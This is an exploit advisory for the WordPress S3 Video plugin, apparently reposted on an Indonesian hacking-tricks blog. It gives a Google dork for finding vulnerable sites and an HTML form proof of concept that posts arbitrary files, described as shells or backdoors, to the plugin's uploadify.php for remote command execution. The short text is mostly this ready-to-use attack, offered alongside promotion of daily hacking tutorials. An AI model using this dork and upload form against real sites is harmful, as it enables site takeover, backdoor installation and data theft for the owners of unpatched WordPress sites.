WordPress Plugins S3 Video Remote Shell Upload

#- Title: WordPress Plugin S3 Video Remote Shell Upload
#- Author: Manish Kishan Tanwar AKA error1046
#- Date: 9/12/2015
#- Developer : Anthony Mills
#- Link Download : Wordpress. org/plugins/s3-video/
#- Google Dork: inurl:wp-content/plugins/s3-video/
#- Tested on : Win 8.1 RT
#- Fixed in Version : > 0.91

Vulrnerability : 

Description : 
Wordpress plugins S3 Video is suffer from uploadify vulnerability remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files.

Upgrade new version of patch

-- Proof Of Concept --

You can use remote (xampp) , but i'd do simple way.. i will use csrf method.

Code : 
<form method=post action="http://www.3xploi7. com/wp-content/plugins/s3-video/includes/uploadify.php" enctype="multipart/form-data">
<input type=file name=Filedata> <input type=submit name=submit>

Shell Path : Here !!

Kami update trik tutorial setiap hari, Jangan Sampai Ketinggalan

0 Response to "WordPress Plugins S3 Video Remote Shell Upload"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel

• Join Grup 3xploi7 : Here 
• Tonton Streaming Tv : Here